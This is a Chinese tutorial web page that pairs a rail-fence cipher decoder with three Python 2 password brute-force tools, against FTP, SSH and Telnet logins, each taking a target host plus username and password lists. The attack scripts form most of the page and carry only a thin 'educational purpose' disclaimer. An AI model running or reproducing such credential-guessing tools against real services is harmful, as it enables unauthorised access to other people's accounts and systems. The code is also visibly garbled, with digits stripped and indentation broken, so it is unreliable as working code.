Python脚本暴力破解栅栏密码

 更新时间:2015年10月19日 10:49:57   投稿:mrr  
在渗透测试当中,免不了要进行密码破解。本文通过好几种方法给大家介绍python密码破解,有通用脚本,FTP暴力破解脚本,SSH暴力破解,TELNET密码暴力破解,感兴趣的朋友一起学习吧

今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。

方法一(通用脚本):

#!/usr/bin/env python
 # -*- coding: gbk -*-
 # -*- coding: utf_ -*-
 e = raw_input(‘请输入要解密的字符串\n‘)
 elen = len(e)
 field=[]
 for i in range(,elen):
       if(elen%i==):
         field.append(i)
 for f in field:
   b = elen / f
   result = {x:‘‘ for x in range(b)}
   for i in range(elen):
     a = i % b;
     result.update({a:result[a] + e[i]})
   d = ‘‘
   for i in range(b):
     d = d + result[i]
   print ‘分为\t‘+str(f)+‘\t‘+‘栏时,解密结果为: ‘+d

方法二:

FTP暴力破解脚本

#!/usr/bin/env python
#-*-coding = utf--*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@--
import sys, os, time
from ftplib import FTP
docs = """
      [*] This was written for educational purpose and pentest only. Use it at your own risk. 
      [*] Author will be not responsible for any damage!
      [*] Toolname : ftp_bf.py
      [*] Coder :
      [*] Version : .
      [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
    """
if sys.platform == 'linux' or sys.platform == 'linux':
  clearing = 'clear'
else:
  clearing = 'cls'
os.system(clearing)
R = "\[m";
G = "\[m";
Y = "\[m"
END = "\[m"
def logo():
  print G+"\n |---------------------------------------------------------------|"
  print " | |"
  print " | blog.sina.com.cn/kaiyongdeng |"
  print " | // ftp_bf.py v.. |"
  print " | FTP Brute Forcing Tool |"
  print " | |"
  print " |---------------------------------------------------------------|\n"
  print " \n [-] %s\n" % time.strftime("%X")
  print docs+END
def help():
  print R+"[*]-t, --target ip/hostname <> Our target"
  print "[*]-u, --usernamelist usernamelist <> usernamelist path"
  print "[*]-p, --passwordlist passwordlist <> passwordlist path"
  print "[*]-h, --help help <> print this help"
  print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit()
def bf_login(hostname,username,password):
  # sys.stdout.write("\r[!]Checking : %s " % (p))
  # sys.stdout.flush()
  try:
    ftp = FTP(hostname)
    ftp.login(hostname,username, password)
    ftp.retrlines('list')
    ftp.quit()
    print Y+"\n[!] wt,wt!!! We did it ! "
    print "[+] Target : ",hostname, ""
    print "[+] User : ",username, ""
    print "[+] Password : ",password, ""+END
    return 
  # sys.exit()
  except Exception, e:
    pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END
  sys.exit()
def anon_login(hostname):
  try:
    print G+"\n[!] Checking for anonymous login.\n"+END
    ftp = FTP(hostname) ftp.login()
    ftp.retrlines('LIST')
    print Y+"\n[!] wt,wt!!! Anonymous login successfuly !\n"+END
    ftp.quit()
  except Exception, e:
    print R+"\n[-] Anonymous login failed...\n"+END
    pass
def main():
  logo()
  try:
    for arg in sys.argv:
      if arg.lower() == '-t' or arg.lower() == '--target':
        hostname = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
        usernamelist = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
        passwordlist = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == '-h' or arg.lower() == '--help':
        help()
      elif len(sys.argv) <= :
        help()
  except:
    print R+"[-]Cheak your parametars input\n"+END
    help()
  print G+"[!] BruteForcing target ..."+END
  anon_login(hostname)
  # print "here is ok"
  # print hostname
  try:
    usernames = open(usernamelist, "r")
    user = usernames.readlines()
    count = 
    while count < len(user):
      user[count] = user[count].strip()
      count +=
  except:
    print R+"\n[-] Cheak your usernamelist path\n"+END
    sys.exit()
  # print "here is ok ",usernamelist,passwordlist
  try:
    passwords = open(passwordlist, "r")
    pwd = passwords.readlines()
    count = 
    while count < len(pwd):
      pwd[count] = pwd[count].strip()
      count +=
  except:
    print R+"\n[-] Check your passwordlist path\n"+END
    sys.exit()
  print G+"\n[+] Loaded:",len(user),"usernames"
  print "\n[+] Loaded:",len(pwd),"passwords"
  print "[+] Target:",hostname
  print "[+] Guessing...\n"+END
  for u in user: for p in pwd:
    result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
    if result != :
      print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
    else:
      print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
    if not result :
      print R+"\n[-]There is no username ans password enabled in the list."
      print "[-]Exiting...\n"+END
if __name__ == "__main__":
  main()

SSH暴力破解

#!/usr/bin/env python
#-*-coding = UTF--*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
import sys
import os
import time
#from threading import Thread
try:
  from paramiko import SSHClient
  from paramiko import AutoAddPolicy
except ImportError:
  print G+'''
  You need paramiko module.
http://www.lag.net/paramiko/
  Debian/Ubuntu: sudo apt-get install aptitude
     : sudo aptitude install python-paramiko\n'''+END
  sys.exit()
docs = """
      [*] This was written for educational purpose and pentest only. Use it at your own risk.
      [*] Author will be not responsible for any damage!                               
      [*] Toolname    : ssh_bf.py
      [*] Author     : xfk
      [*] Version     : v..
      [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
  """
if sys.platform == 'linux' or sys.platform == 'linux':
     clearing = 'clear'
else: 
     clearing = 'cls'
os.system(clearing)
R = "\[m";
G = "\[m";
Y = "\[m"
END = "\[m"
def logo():
     print G+"\n        |---------------------------------------------------------------|"
     print "        |                                |"
     print "        |        blog.sina.com.cn/kaiyongdeng          |"
     print "        |        // ssh_bf.py v..           |"
     print "        |         SSH Brute Forcing Tool            |"
     print "        |                                |"
     print "        |---------------------------------------------------------------|\n"
     print " \n           [-] %s\n" % time.ctime()
     print docs+END
def help():
  print Y+"    [*]-H    --hostname/ip    <>the target hostname or ip address"
  print "   [*]-P    --port     <>the ssh service port(default is )"
  print "   [*]-U    --usernamelist   <>usernames list file"
  print "   [*]-P    --passwordlist   <>passwords list file"
  print "   [*]-H    --help     <>show help information"
  print "   [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
  sys.exit()
def BruteForce(hostname,port,username,password):
    '''
    Create SSH connection to target
    '''
    ssh = SSHClient()
    ssh.set_missing_host_key_policy(AutoAddPolicy())
    try:
      ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
      status = 'ok'
      ssh.close()
    except Exception, e:
      status = 'error'
      pass
  return status
def makelist(file):
  '''
  Make usernames and passwords lists
  '''
  items = []
  try:
    fd = open(file, 'r')
  except IOError:
    print R+'unable to read file \'%s\'' % file+END
    pass
  except Exception, e:
    print R+'unknown error'+END
    pass
  for line in fd.readlines():
    item = line.replace('\n', '').replace('\r', '')
    items.append(item)
  fd.close() 
  return items
def main():
    logo() 
#  print "hello wold"
    try:  
        for arg in sys.argv:
            if arg.lower() == '-t' or arg.lower() == '--target':
                hostname = str(sys.argv[int(sys.argv[:].index(arg))+])
        if arg.lower() == '-p' or arg.lower() == '--port':
          port = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-u' or arg.lower() == '--userlist':
                userlist = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                wordlist = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == '-h' or arg.lower() == '--help':
                help()
      elif len(sys.argv) <= :
                help()
    except:
        print R+"[-]Cheak your parametars input\n"+END
        help()
    print G+"\n[!] BruteForcing target ...\n"+END
#    print "here is ok"
#    print hostname,port,wordlist,userlist
    usernamelist = makelist(userlist)
    passwordlist = makelist(wordlist)
    print Y+"[*] SSH Brute Force Praparing."
    print "[*] %s user(s) loaded." % str(len(usernamelist))
    print "[*] %s password(s) loaded." % str(len(passwordlist))
    print "[*] Brute Force Is Starting......."+END
  try:
      for username in usernamelist:
        for password in passwordlist:
        print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END
            current = BruteForce(hostname, port, username, password)
              if current == 'error':
          print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END
#                pass
              else:
                  print G+"\n[+] ^-^ HaHa,We Got It!!!"
                  print "[+] username: %s" % username
                  print "[+] password: %s\n" % password+END
#                  sys.exit()
  except:
    print R+"\n[-] There Is Something Wrong,Pleace Cheak It."
    print "[-] Exitting.....\n"+END
    raise
    print Y+"[+] Done.^-^\n"+END
    sys.exit()
if __name__ == "__main__":
  main()

TELNET密码暴力破解

#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkcde.com
#dhydr[at]gmail[dot]com
import threading, time, random, sys, telnetlib
from copy import copy
if len(sys.argv) !=:
  print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
  sys.exit()
try:
  users = open(sys.argv[], "r").readlines()
except(IOError):
  print "Error: Check your userlist path\n"
  sys.exit()
try:
  words = open(sys.argv[], "r").readlines()
except(IOError):
  print "Error: Check your wordlist path\n"
  sys.exit()
print "\n\t  dhydr[at]gmail[dot]com TelnetBruteForcer v."
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
  for word in wordlist:
    words.append(word)
def getword():
  lock = threading.Lock()
  lock.acquire()
  if len(words) != :
    value = random.sample(words, )
    words.remove(value[])
  else:
    print "\nReloading Wordlist - Changing User\n"
    reloader()
    value = random.sample(words, )
    users.remove(users[])
  lock.release()
  if len(users) ==:
    return value[][:-], users[]
  else:
    return value[][:-], users[][:-]
class Worker(threading.Thread):
  def run(self):
    value, user = getword()
    try:
      print "-"*
      print "User:",user,"Password:",value
      tn = telnetlib.Telnet(sys.argv[])
      tn.read_until("login: ")
      tn.write(user + "\n")
      if password:
          tn.read_until("Password: ")
          tn.write(value + "\n")
      tn.write("ls\n")
      tn.write("exit\n")
      print tn.read_all()
      print "\t\nLogin successful:",value, user
      tn.close()
      work.join()
      sys.exit()
    except:
      pass
for I in range(len(words)*len(users)):
  work = Worker()
  work.start()
  time.sleep()

相关文章

  • Python3.5基础之NumPy模块的使用图文与实例详解

    Python3.5基础之NumPy模块的使用图文与实例详解

    这篇文章主要介绍了Python3.5基础之NumPy模块的使用,结合图文与实例形式详细分析了Python3.5中Numpy模块的原理、功能、使用方法及操作注意事项,需要的朋友可以参考下
    2019-04-04
  • Python实现数据地址实体抽取

    Python实现数据地址实体抽取

    大家好,本篇文章主要讲的是Python实现数据地址实体抽取,感兴趣的同学赶快来看一看吧,对你有帮助的话记得收藏一下
    2022-02-02
  • Python操作MySQL数据库的两种方式实例分析【pymysql和pandas】

    Python操作MySQL数据库的两种方式实例分析【pymysql和pandas】

    这篇文章主要介绍了Python操作MySQL数据库的两种方式,结合实例形式分析了Python使用pymysql和pandas模块进行mysql数据库的连接、增删改查等操作相关实现技巧,需要的朋友可以参考下
    2019-03-03
  • Python骚操作之动态定义函数

    Python骚操作之动态定义函数

    这篇文章主要介绍了Python骚操作之动态定义函数,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2019-03-03
  • 纯Python实现遗传算法详解

    纯Python实现遗传算法详解

    遗传算法(GA)是七十年代被霍兰德提出来的,那还是8086的时代,但在如今的3nm时代,仍然散发着经典的光辉,下面我们就来看看如何利用Python实现遗传算法吧
    2023-08-08
  • Python机器学习入门(一)序章

    Python机器学习入门(一)序章

    这篇文章主要介绍了Python机器学习入门知识,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
    2021-08-08
  • Python将字符串常量转化为变量方法总结

    Python将字符串常量转化为变量方法总结

    在本篇内容里我们给大家整理了一篇关于Python将字符串常量转化为变量方法的知识点总结,有需要的朋友们学习下。
    2019-03-03
  • python按键按住不放持续响应的实例代码

    python按键按住不放持续响应的实例代码

    今天小编就为大家分享一篇python按键按住不放持续响应的实例代码,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
    2019-07-07
  • python两种遍历字典(dict)的方法比较

    python两种遍历字典(dict)的方法比较

    这篇文章主要介绍了python两种遍历字典(dict)的方法比较,同时介绍了dict遍历中带括号与不带括号的性能问题,需要的朋友可以参考下
    2014-05-05
  • python字符串编码识别模块chardet简单应用

    python字符串编码识别模块chardet简单应用

    有时候需要先检测一个文件的编码,然后将其转化为另一种编码。这时候就会用到chardet(chardet是python的一个第三方库,是非常优秀的编码识别模块)
    2015-06-06

最新评论